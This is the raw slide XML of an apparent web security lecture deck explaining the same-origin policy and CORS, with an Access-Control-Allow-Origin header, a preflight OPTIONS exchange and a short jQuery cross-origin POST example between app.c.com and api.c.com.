          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Cannot make requests to a different origin unless allowed by the destination</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Can only read responses from the same origin (unless allowed by destination origin)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>XMLHttpRequests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> are policed by </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>CORS: Cross-Origin Resource Sharing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92163" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EB2AB7B-094D-1B45-8932-7C5E277CFB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73276" y="2079626"/>
            <a:ext cx="8069263" cy="402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4290" tIns="34290" rIns="34290" bIns="34290" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="342900" indent="-342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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296863" indent="-296863">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buChar char="•"/>
              <a:defRPr kumimoji="1"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•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lvl="1">
              <a:spcBef>
                <a:spcPts val="1713"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzPct val="46000"/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="ko-KR">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
              <a:sym typeface="Helvetica Neue Light" panose="020004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6624386"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition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1" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{712827DE-6171-6444-8FD0-551D2290226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ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
                <a:sym typeface="Helvetica Neue Light" panose="02000403000000020004" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>CORS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              <a:sym typeface="Helvetica Neue Light" panose="02000403000000020004" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78A56533-7C42-CE44-AF2B-83894B2552BA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en-US" sz="2800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Reading permission on the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Access-Control-Allow-Origin: &lt;list of domains&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Sending permission</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>“In-flight” check if the server is willing to receive the request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92163" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EB2AB7B-094D-1B45-8932-7C5E277CFB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73276" y="2079626"/>
            <a:ext cx="8069263" cy="402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4290" tIns="34290" rIns="34290" bIns="34290" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="342900" indent="-342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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296863" indent="-296863">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buChar char="•"/>
              <a:defRPr kumimoji="1"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•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lvl="1">
              <a:spcBef>
                <a:spcPts val="1713"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzPct val="46000"/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="ko-KR">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
              <a:sym typeface="Helvetica Neue Light" panose="02000403000000020004" pitchFamily="2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625D46E-1949-8C4F-BD77-EE8B76E2152D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5570025" y="928284"/>
            <a:ext cx="599555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2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000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Typical usage: Access-Control-Allow-Origin: *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E8F0909-4429-F741-BA18-D476F3058C49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6893824" y="1473720"/>
            <a:ext cx="576720" cy="1100160"/>
            <a:chOff x="6893824" y="1473720"/>
            <a:chExt cx="576720" cy="1100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A02DC3E8-00CB-624F-8563-7AAB8F54DD73}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6893824" y="1473720"/>
                <a:ext cx="574920" cy="103680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A02DC3E8-00CB-624F-8563-7AAB8F54DD73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885184" y="1465080"/>
                  <a:ext cx="592560" cy="10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B4BAE7FE-E44E-C340-98C3-1717F62582E9}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6939904" y="2499000"/>
                <a:ext cx="530640" cy="7488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B4BAE7FE-E44E-C340-98C3-1717F62582E9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930904" y="2490360"/>
                  <a:ext cx="548280" cy="9252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7C2AB91F-F384-8E43-9BCC-5F05DFE4F0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/>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9607117" y="1378194"/>
            <a:ext cx="1532527" cy="1519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540280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438D7-4F92-2F44-B90E-3BB90AD0E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CORS Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="download.jpg" descr="download.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5207CC5F-05CC-5A46-B8FE-F615DE24FC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228" y="3911404"/>
            <a:ext cx="1307310" cy="13106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sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Origin: app.c.com…">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3199B0EA-7810-5F49-ACE3-F298451C6704}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6859737" y="1321632"/>
            <a:ext cx="3019370" cy="1823442"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumOff val="-13575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171450">
              <a:defRPr sz="2900" b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1600" dirty="0">
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>$.post({</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0" err="1">
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>: “</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0" err="1">
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>api.c.com</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>/x“, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="171450">
              <a:defRPr sz="2900" b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1600" dirty="0">
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>  success: function(r){</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1600" dirty="0">
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>    $("#div1").html(r); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="171450">
              <a:defRPr sz="2900" b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1600" dirty="0">
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="171450">
              <a:defRPr sz="2900" b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1600" dirty="0">
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>});</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Origin:  api.c.com">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD0B8858-5EA5-404F-9A59-DFDF0FD0A2BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7566212" y="4356635"/>
            <a:ext cx="2016733" cy="1371585"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:satOff val="-15798"/>
              <a:lumOff val="-17517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171450">
              <a:defRPr sz="2900" b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sz="1600" dirty="0">
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier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78B5BB5-0E5B-8C4B-88D9-099601852BDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="2" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2312894" y="2014194"/>
            <a:ext cx="3783106" cy="1697194"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="508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6A76DCD-B33F-AB4B-9B07-95A5C894CACE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3173506" y="2420471"/>
            <a:ext cx="114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" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>POST /x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66CDB1A-7570-FE4B-802D-AF60D5CAEDC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2365097" y="3957917"/>
            <a:ext cx="3947084" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="508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E94AAD3-6DA5-E742-8CE6-BC2A0017F15F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3170217" y="3564823"/>
            <a:ext cx="1563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" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>OPTIONS /x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FDB7520-56D3-1F4B-8788-B0616F8B9F63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2365097" y="4166346"/>
            <a:ext cx="3947084" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="508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Header:…">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CAE26D8-BC75-FE42-B7DD-D28024CF6B31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2287915" y="4406922"/>
            <a:ext cx="4865920" cy="469359"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="19050" tIns="19050" rIns="19050" bIns="19050" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="171450">
              <a:defRPr sz="2700" b="0">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Header: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="171450">
              <a:defRPr sz="2700" b="0">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Access-Control-Allow-Origin:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" dirty="0" err="1">
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>app.c.com</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier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5ACEA11-3ED6-514F-B18A-CE2F0DC779B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2426913" y="5419164"/>
            <a:ext cx="3947084" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="508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F0B15DB6-C2B6-5D48-A048-3F6389BD0CCA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3188965" y="4997865"/>
            <a:ext cx="114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" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>POST /x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55019E9-5F69-4D4F-B21D-CE92A88A004E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2312894" y="5675678"/>
            <a:ext cx="3947084" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="508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B23851E2-1A31-5D4F-87AB-107DA65B5EE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3173506" y="5747526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" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>DATA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A0B4914-4CE8-DA43-BC0D-91652642C4EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7566212" y="3944471"/>
            <a:ext cx="1773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origin: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>api.c.com</a:t>
            </a:r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8C4A795-4947-5645-894E-0723A651412E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8024112" y="930884"/>
            <a:ext cx="18549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origin: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>app.c.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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BB60A7A-7A94-694B-A8D6-381A91F8ADB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1330384" y="1807080"/>
            <a:ext cx="4149360" cy="3853080"/>
            <a:chOff x="1330384" y="1807080"/>
            <a:chExt cx="4149360" cy="3853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9D3D8F97-33D8-EA48-B155-7FE7B9F6E652}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1330384" y="1807080"/>
                <a:ext cx="4149360" cy="385308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9D3D8F97-33D8-EA48-B155-7FE7B9F6E652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294744" y="1771440"/>
                  <a:ext cx="4221000" cy="392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975DBA39-B2C0-CD4F-B100-AAD36D0FC7E8}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5156104" y="1970880"/>
                <a:ext cx="307080" cy="28728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975DBA39-B2C0-CD4F-B100-AAD36D0FC7E8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120104" y="1935240"/>
                  <a:ext cx="378720" cy="35892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30" name="download.png" descr="download.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFE6C95A-7F85-0F4C-AB7F-4647E69432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6168" y="4482527"/>
            <a:ext cx="371475" cy="371475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="FFC000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7698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3" grpId="0"/>
      <p:bldP spid="20" grpId="0" animBg="1"/>
      <p:bldP spid="22" grpId="0"/>
      <p:bldP spid="24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438D7-4F92-2F44-B90E-3BB90AD0E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CORS Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="download.jpg" descr="download.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5207CC5F-05CC-5A46-B8FE-F615DE24FC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228" y="3911404"/>
            <a:ext cx="1307310" cy="13106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sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Origin: app.c.com…">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3199B0EA-7810-5F49-ACE3-F298451C6704}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6859737" y="1321632"/>
            <a:ext cx="3019370" cy="1823442"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumOff val="-13575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171450">
              <a:defRPr sz="2900" b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1600" dirty="0">
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>$.post({</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0" err="1">
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>: “</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0" err="1">
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>api.c.com</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>/x“, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="171450">
              <a:defRPr sz="2900" b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1600" dirty="0">
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>  success: function(r){</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1600" dirty="0">
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>    $("#div1").html(r); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="171450">
              <a:defRPr sz="2900" b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1600" dirty="0">
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="171450">
              <a:defRPr sz="2900" b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1600" dirty="0">
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>});</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Origin:  api.c.com">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD0B8858-5EA5-404F-9A59-DFDF0FD0A2BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7566212" y="4356635"/>
            <a:ext cx="2016733" cy="1371585"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:satOff val="-15798"/>
              <a:lumOff val="-17517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171450">
              <a:defRPr sz="2900" b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sz="1600" dirty="0">
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier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78B5BB5-0E5B-8C4B-88D9-099601852BDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="2" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2312894" y="2014194"/>
            <a:ext cx="3783106" cy="1697194"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="508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6A76DCD-B33F-AB4B-9B07-95A5C894CACE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
